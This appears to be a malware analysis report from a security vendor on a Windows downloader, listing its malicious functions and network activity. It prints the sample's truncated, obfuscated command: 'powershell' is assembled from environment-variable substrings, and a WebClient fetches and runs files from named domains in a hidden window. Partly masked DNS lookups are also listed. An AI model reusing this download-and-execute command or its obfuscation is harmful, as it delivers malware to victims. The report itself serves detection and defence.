Technical Information
Malicious functions
Downloads and executes files.
Executes the following (exploit)
- '<SYSTEM32>\cmd.exe' \c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $MalaysianRinggitv64='Drivesp88';$Avonuw65=new-object Net.WebClient;$ArmenianDramp86='http:\\easyaccesshs.com\WYPsCYUe_89F0oV@http:\\dowse...
Network activity
TCP
Other
- 'im####n-israel.com':443
UDP
- DNS ASK ea####cesshs.com
- DNS ASK do####ervices.com
- DNS ASK im####n-israel.com
- DNS ASK gi####rlopuppo.com
- DNS ASK kc###ing.co.za
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\cmd.exe' \c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $MalaysianRinggitv64='Drivesp88';$Avonuw65=new-object Net.WebClient;$ArmenianDramp86='http:\\easyaccesshs.com\WYPsCYUe_89F0oV@http:\\dowse...' (with hidden window)
